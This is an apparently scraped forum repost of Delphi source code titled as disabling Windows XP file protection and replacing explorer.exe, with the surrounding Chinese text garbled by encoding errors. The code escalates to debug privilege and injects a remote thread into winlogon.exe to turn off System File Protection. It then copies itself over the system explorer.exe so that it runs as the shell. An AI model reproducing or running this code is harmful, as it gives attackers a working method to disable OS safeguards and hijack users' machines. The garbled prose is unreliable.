关闭XP保护。替换explorer¸exe¸txt

关闭XP保护。替换explorer¸exe¸txt linkboy2004µÄ???Í?º?Ø?ÕXP??????Ìæ??explorer.exeÊÕ?Ø ?Ø?ÕXP??????Ìæ??explorer.exeÊÕ?Ø ????Ê??ä?º2008-02-01 20:32 µ??Á?º ????ÔÚÅ?µÄVPCÉÏ?âÊÔÊÇ?ÉÒÔµÄ??Ã?ÓÐ?ü?àµÄ?âÊÔ. ????Å???Ã?Óе?ÓÃdllcacheÄ?Â?ϵÄ.ÄãÏ????É ????{*******************************************************} ????{ } ????{ ?Ø?ÕXP??????Ìæ??explorer.exe } ????{ } ????{ ?æÈ?ËùÓÐ (C) 2008 bbs.secdst.net } ????{ } ????{*******************************************************} ????program Project1; ????uses ????Windows,TlHelp32; ????function LowerCase(const S: string): string; //תÐ?Ð? ????var ????Ch: Char; ????L: Integer; ????Source, Dest: PChar; ????begin ????L := Length(S); ????SetLength(Result, L); ????Source := Pointer(S); ????Dest := Pointer(Result); ????while L <>0 do ????begin ????Ch := Source^; ????if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32); ????Dest^ := Ch; ????Inc(Source); ????Inc(Dest); ????Dec(L); ????end; ????end; ????function CreatedMutexEx(MutexName: Pchar): Boolean; ????var ????MutexHandle: dword; ????begin ????MutexHandle := CreateMutex(nil, True, MutexName); ????if MutexHandle <>0 then ????begin ????if GetLastError = ERROR_ALREADY_EXISTS then ????begin ????//CloseHandle(MutexHandle); ????Result := False; ????Exit; ????end; ????end; ????Result := True; ????end; ????function GetWinPath: string; //È?WINDOWSÄ?Â? ????var ????Buf: array[0..MAX_PATH] of char; ????begin ????GetWindowsDirectory(Buf, MAX_PATH); ????Result := Buf; ????if Result[Length(Result)]<>'\' then Result := Result + '\'; ????end; ????function GetTempDirectory: string; //È?ÁÙÊ?Ä?Â? ????var ????Buf: array[0..MAX_PATH] of char; ????begin ????GetTempPath(MAX_PATH,Buf); ????Result := Buf; ????if Result[Length(Result)]<>'\' then Result := Result + '\'; ????end; ????function EnableDebugPriv : Boolean; //ÌáÈ?ΪDEBUG ????var ????hToken : THANDLE; ????tp : TTokenPrivileges; ????rl : Cardinal; ????begin ????result := false; ????OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken); ????if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then ????begin ????tp.PrivilegeCount := 1; ????tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; ????result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl); ????end; ????end; ????procedure InjectThread(ProcessHandle: DWORD); //×?Èëwinlogon.exe ?Ø?ÕXPÎÄ?þ???? ????var ????TID: LongWord; ????hSfc,hThread: HMODULE; ????pfnCloseEvents: Pointer; ????begin ????hSfc := LoadLibrary('sfc_os.dll'); ????pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2)); ????FreeLibrary(hSfc); ????hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID); ????WaitForSingleObject(hThread, 4000); ????end; ????procedure InitProcess(Name: string); //?éÕÒwinlogon.exe?ø?ÌPID ????var ????FSnapshotHandle: THandle; ????FProcessEntry32: TProcessEntry32; ????ProcessHandle:dword; ????begin ????FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); ????FProcessEntry32.dwSize:=Sizeof(FProcessEntry32); ????if Process32First(FSnapshotHandle,FProcessEntry32) then begin ????repeat ????If Name = LowerCase(FProcessEntry32.szExeFile) then ????begin ????ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID); ????InjectThread(ProcessHandle); ????CloseHandle(ProcessHandle); ????Break; ????end; ????until not Process32Next(FSnapshotHandle,FProcessEntry32); ????end; ????CloseHandle(FSnapshotHandle); ????end; ????const ExpFile = 'explorer.exe'; ????MasterMutex = 'OpenSoul'; ????var ????s: string; ????begin ????if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //???ðÌå ????if not EnableDebugPriv then Exit; //ÌáÈ?Ê??ÜÍË?ö ????InitProcess('winlogon.exe') ;//×?Èëwinlogon.exe ÏÈ?Ø?ÕxpµÄÎÄ?þ???? .Ô??ÀϵÍ?µÄ??Ô, ????s := ParamStr(0) ;//È???Ãû ????if LowerCase(s) <>LowerCase(GetWinPath + ExpFile) then //ÅÐ?Ï×Ô?ºÊÇ??ÊÇϵÍ?ϵÄexplorer.exe ????begin //Èç?û??ÊÇ ????MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //ÏÈÒÆ??ÕýÔÚÔËÐеÄexplorer.exe ????CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ;//?Ñ×Ô?º??ÖƵ?windowsÄ?Â? Ϊexplorer.exe ????end; ????WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //ÔËÐÐÕæÕýµÄexplorer.exe ????end. Powered by soft.pt42.cn